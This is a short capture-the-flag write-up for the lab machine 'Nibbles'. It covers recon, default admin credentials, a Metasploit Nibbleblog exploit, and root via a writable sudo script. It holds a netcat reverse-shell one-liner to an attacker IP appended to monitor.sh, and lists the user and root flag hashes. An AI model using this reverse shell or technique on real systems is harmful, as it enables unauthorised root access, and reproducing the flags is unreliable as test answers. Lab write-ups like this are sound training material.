Nibbles
OS: Linux
IP: 10.10.10.75
User: b02ff32bb332deba49eeaed21152c8d8
Root: b6d745c0dfb6457c55591efc898ef88c
80/tcp open http Apache httpd 2.4.18
Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code.
Nmap
Visiting Port 80 and viewing the source code gives us the following:
Using dirb against /nibbleblog gives us admin.php which is a login interface.
Testing the usernames and passwords for defaults gives us admin:nibbles
Searching for exploits gives us:
We load metasploit and configure our options as follows:
Run the exploit and get a low privileged user as nibbles:
Running LinEnum.sh on the host gives us a potential lead.
So we need to unzip personal.zip within /home/nibbler and modify monitor.sh to get root.
We set up a nc listener on port 2491 locally and we insert the following command into the monitor.sh file:
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 2491 >/tmp/f” >> monitor.sh
We then execute the monitor.sh file with /usr/bin/sudo to receive our root shell.
And we receive a root shell in return.
